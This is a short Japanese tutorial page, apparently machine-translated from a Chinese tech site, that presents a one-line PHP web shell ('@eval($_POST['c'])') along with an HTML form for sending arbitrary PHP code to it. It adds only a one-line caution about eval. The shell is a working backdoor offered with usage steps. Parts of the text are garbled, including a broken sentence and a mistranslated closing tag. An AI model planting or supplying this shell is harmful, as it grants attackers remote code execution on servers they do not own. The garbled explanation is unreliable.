php eval function用の一文トロイの木馬コード_PHPチュートリアル

php eval 関数の 1 文のトロイの木馬コード

これは、PHP の一般的な 1 文のトロイの木馬のソース コードです。このトロイの木馬は、PHP に従って文字列を計算します。コード。文字列は有効な PHP コードである必要があり、セミコロンで終わる必要があります。コード文字列内で return ステートメントが呼び出されない場合は、NULL が返されます。コードに解析エラーがある場合、eval() 関数は false を返します。

eval は他の PHP コードを実行するために使用できるため、コード内に eval 関数が見つかった場合は、トロイの木馬である可能性があるので注意してください

この一文だけで人が死ぬ可能性があり、誰でもどんな文書でも投稿できるので注意してください

?

1	<?php @eval($_POST['c']);?>

使用方法も非常に簡単で、ローカルの投稿ファイルを送信ファイルに指すと、中のphpコードが実行されます

?

1 2 3 4 5 6 7 8

<html> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </ボディ> </html>

以上がこの記事の全内容ですが、皆さんに気に入っていただければ幸いです。

http://www.bkjia.com/PHPjc/1003822.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/1003822.html技術記事 PHP eval 関数の 1 文のトロイの木馬コード これは、PHP の一般的な 1 文のトロイの木馬のソース コードです。このトロイの木馬は、ポスト トロイの木馬プログラムを通じて埋め込まれます。eval() 関数は、PHP コードに従って文字列を計算します。 ...